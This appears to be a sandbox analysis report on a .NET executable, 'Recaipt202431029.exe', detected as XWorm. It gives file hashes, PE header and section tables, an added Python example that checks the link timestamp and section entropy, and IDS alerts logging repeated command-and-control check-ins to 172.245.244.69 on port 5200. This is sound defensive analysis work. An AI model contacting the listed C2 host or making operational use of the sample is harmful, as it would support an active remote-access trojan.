              • Win32 Executable (generic) a (10002005/4) 49.78%
              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
              • Generic Win/DOS Executable (2004/3) 0.01%
              • DOS Executable Generic (2002/1) 0.01%
              File name:Recaipt202431029.exe
              File size:752'128 bytes
              MD5:7b8044f78e70383a436ebbae2df47808
              SHA1:002de1bb6aa1d9ef1a3f107cb7f5615be50f27a7
              SHA256:b10e44ddfe6caff1127a964d4a5b9ebdbf9e92a24c2a2957e044dd45b14e8967
              SHA512:f55144ea7f477868abeb84f558b3e6f670aa1b3b35ad3490b8c6fc54c25033ad04aba098f2db0dc601c0f17b88978621800ee79818f00fd0974c9e881b244f42
              SSDEEP:12288:jO1tqPiq7EYBnIsLC304C75kt6WG6RF6yRQxgiDkX1pKP/ehdAA:jO1tM3RpUS7o6WG6T2KiAXaiA
              TLSH:0BF4BEE06744C526D8A757B88833E2B766336E4EAC54C60E2EC5FE9F7C32742041799B
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...po................0.................. ... ....@.. ....................................@................................
              Icon Hash:2eec8e8cb683b9b1
              Entrypoint:0x4a060a
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp:0xCBDF6F70 [Sun May 22 04:05:04 2078 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
              Instruction
              jmp dword ptr [00402000h]
              add dword ptr [eax], eax
              add byte ptr [eax], al
              add al, byte ptr [eax]
              add byte ptr [eax], al
              add al, 00h
              add byte ptr [eax], al
              or byte ptr [eax], al
              add byte ptr [eax], al
              adc byte ptr [eax], al
              add byte ptr [eax], al
              and byte ptr [eax], al
              add byte ptr [eax], al
              inc eax
              add byte ptr [eax], al
              add byte ptr [eax+00000000h], al
              add dword ptr [eax], eax
              add byte ptr [eax], al
              add al, byte ptr [eax]
              add byte ptr [eax], al
              add al, 00h
              add byte ptr [eax], al
              or byte ptr [eax], al
              add byte ptr [eax], al
              adc byte ptr [eax], al
              add byte ptr [eax], al
              and byte ptr [eax], al
              add byte ptr [eax], al
              inc eax
              add byte ptr [eax], al
              add byte ptr [eax+00530000h], al
              jns 00007F68F0F96BE2h
              jnc 00007F68F0F96BE2h
              je 00007F68F0F96BE2h
              add byte ptr [ebp+00h], ch
              add byte ptr [edx+00h], dl
              add byte ptr [esi+00h], ah
              insb
              add byte ptr [ebp+00h], ah
              arpl word ptr [eax], ax
              je 00007F68F0F96BE2h
              imul eax, dword ptr [eax], 006E006Fh
              add byte ptr [ecx+00h], al
              jnc 00007F68F0F96BE2h
              jnc 00007F68F0F96BE2h
              add byte ptr [ebp+00h], ch
              bound eax, dword ptr [eax]
              insb
              add byte ptr [ecx+00h], bh
              add byte ptr [eax], al
              add byte ptr [eax], al
              dec esp
              add byte ptr [edi+00h], ch
              popad
              add byte ptr [eax+eax+00h], ah
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa05b8 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa2000 | 0x18c8c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xbc000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x9d3ec | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x9e690 | 0x9e800 | 4593e5d435bfd29157b08d343364c08a | False | 0.8612434074329653 | data | 7.62917059033493 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xa2000 | 0x18c8c | 0x18e00 | cc0017cb524f02e755241f87ea3c956e | False | 0.14699473932160803 | data | 4.3379715805866805 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xbc000 | 0xc | 0x200 | a1831f5ab52f638442aaeef02604d522 | False | 0.044921875 | data | 0.07763316234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xa21f0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | | | 0.2649377593360996
RT_ICON | 0xa4798 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | | | 0.3646810506566604
RT_ICON | 0xa5840 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | | | 0.5549645390070922
RT_ICON | 0xa5ca8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2834 x 2834 px/m | | | 0.18115257439773264
RT_ICON | 0xa9ed0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2834 x 2834 px/m | | | 0.0959718443156276
RT_GROUP_ICON | 0xba6f8 | 0x4c | data | | | 0.7631578947368421
RT_VERSION | 0xba744 | 0x35c | data | | | 0.42093023255813955
RT_MANIFEST | 0xbaaa0 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
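Two of the static findings above can be re-derived by hand: the COFF Time Stamp 0xCBDF6F70 decodes to 22 May 2078, after the 24 December 2024 sandbox run (the "Binary contains a suspicious time stamp" signature), and the .text section carries 7.63 bits/byte of entropy in a .NET assembly whose only import is mscoree.dll!_CorExeMain. The block below is an added example, not part of the Joe Sandbox report: it parses IMAGE_FILE_HEADER from a constructed header stub (not the sample's bytes), decodes and sanity-checks the time stamp, and computes the same 8-bit Shannon entropy scale the report uses. The 7.0 bits/byte packing threshold is an assumed rule of thumb, not a Joe Sandbox value.

```python
"""Re-derive two static findings from the report: the COFF time stamp and section entropy."""
import math
import struct
from collections import Counter
from datetime import datetime, timedelta, timezone

# Values copied from the static-analysis tables in this report.
REPORT_TIMESTAMP = 0xCBDF6F70           # "Time Stamp" field
REPORT_TEXT_ENTROPY = 7.62917059033493  # .text section entropy
ANALYSIS_DATE = datetime(2024, 12, 24, tzinfo=timezone.utc)  # date of the sandbox run

_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
# IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
# NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes, little-endian)
_FILE_HEADER = "<HHIIIHH"


def build_stub_pe(timestamp: int, n_sections: int = 3) -> bytes:
    """Constructed, non-loadable header stub (MZ + e_lfanew + 'PE\\0\\0' + COFF header)
    so the parser can be exercised offline. These are not the sample's bytes."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # 0x014C = i386, 0xE0 = PE32 optional header size, 0x0102 = EXECUTABLE_IMAGE | 32BIT_MACHINE
    coff = struct.pack(_FILE_HEADER, 0x014C, n_sections, timestamp, 0, 0, 0xE0, 0x0102)
    return bytes(dos) + b"PE\0\0" + coff


def coff_header(pe: bytes) -> dict:
    """Follow e_lfanew from the DOS header and unpack IMAGE_FILE_HEADER."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsec, ts, _, _, opt_size, chars = struct.unpack_from(_FILE_HEADER, pe, e_lfanew + 4)
    return {"machine": machine, "sections": nsec, "timestamp": ts,
            "opt_header_size": opt_size, "characteristics": chars}


def decode_timestamp(ts: int) -> datetime:
    """TimeDateStamp is seconds since the Unix epoch, UTC. Pure arithmetic, so the
    year-2078 value works regardless of the platform's time_t range."""
    return _EPOCH + timedelta(seconds=ts)


def timestamp_is_suspicious(ts: int, analysed_at: datetime) -> bool:
    """A link time later than the analysis date cannot be genuine: the field was
    either overwritten by the builder/packer or set to a bogus value on purpose."""
    return decode_timestamp(ts) > analysed_at


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 to 8.0), the scale the report uses."""
    if not data:
        return 0.0
    n = len(data)
    h = -sum(c / n * math.log2(c / n) for c in Counter(data).values())
    return h if h > 0 else 0.0


def section_looks_packed(entropy: float, threshold: float = 7.0) -> bool:
    """Rule of thumb (an assumption, not a Joe Sandbox value): plain IL plus metadata
    sits well below 7 bits/byte, so a .text at 7.6 as in this report points at an
    embedded encrypted or compressed payload that is unpacked at run time."""
    return entropy >= threshold


if __name__ == "__main__":
    hdr = coff_header(build_stub_pe(REPORT_TIMESTAMP))
    when = decode_timestamp(hdr["timestamp"])
    print(f"link time {when:%Y-%m-%d %H:%M:%S} UTC, "
          f"suspicious={timestamp_is_suspicious(hdr['timestamp'], ANALYSIS_DATE)}")
    print(f".text entropy {REPORT_TEXT_ENTROPY:.2f}, packed={section_looks_packed(REPORT_TEXT_ENTROPY)}")
    print("uniform bytes:", shannon_entropy(bytes(range(256)) * 4),
          "constant bytes:", shannon_entropy(b"\0" * 512))
```

The same two functions applied to a real file (read the section table, slice the raw bytes, call shannon_entropy) reproduce the per-section entropy column above; the stub builder exists only so the example runs without the sample on disk.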
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-24T11:27:29.137140+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:27:29.157026+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:27:34.318395+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:27:42.161478+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:27:42.163195+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:27:55.176764+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:27:55.182702+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:28:04.239989+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:28:08.110138+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:28:08.111637+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:28:17.962675+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:28:17.964947+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:28:18.154571+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:28:18.156536+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:28:30.317032+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:28:30.322102+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:28:33.489741+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:28:33.681536+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:28:33.797868+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:28:33.917464+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:28:34.332061+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:28:44.253983+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:28:44.258854+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:28:51.800841+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:28:51.812752+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:28:53.785176+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:28:53.788402+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:02.974065+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:02.975687+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:04.441147+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:04.863672+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:05.262060+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:05.264129+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:05.551152+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:06.284365+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:06.288161+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:11.643652+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:11.645831+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:17.315188+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:17.316966+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:17.582556+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:17.584264+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:17.776910+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:17.896637+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:19.190382+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:19.192354+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:24.783837+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:24.786409+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:34.346903+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:37.846437+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:37.852594+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:38.050741+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:38.052245+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:48.736479+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:48.738135+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:54.502249+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:54.512232+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:55.330883+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:55.332454+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:04.073227+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:04.077044+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:04.314256+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:06.173980+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:06.175853+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:10.298346+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:10.299985+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:10.490367+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:10.495047+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:15.438980+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:15.440562+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:15.642570+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:15.644058+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:15.876503+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:15.878620+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:28.698540+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:28.701122+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:31.704643+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:31.706258+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:31.962577+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:31.964910+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:32.158493+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:32.280984+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:34.360302+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:36.784873+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:36.790933+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:37.439402+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:37.443240+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
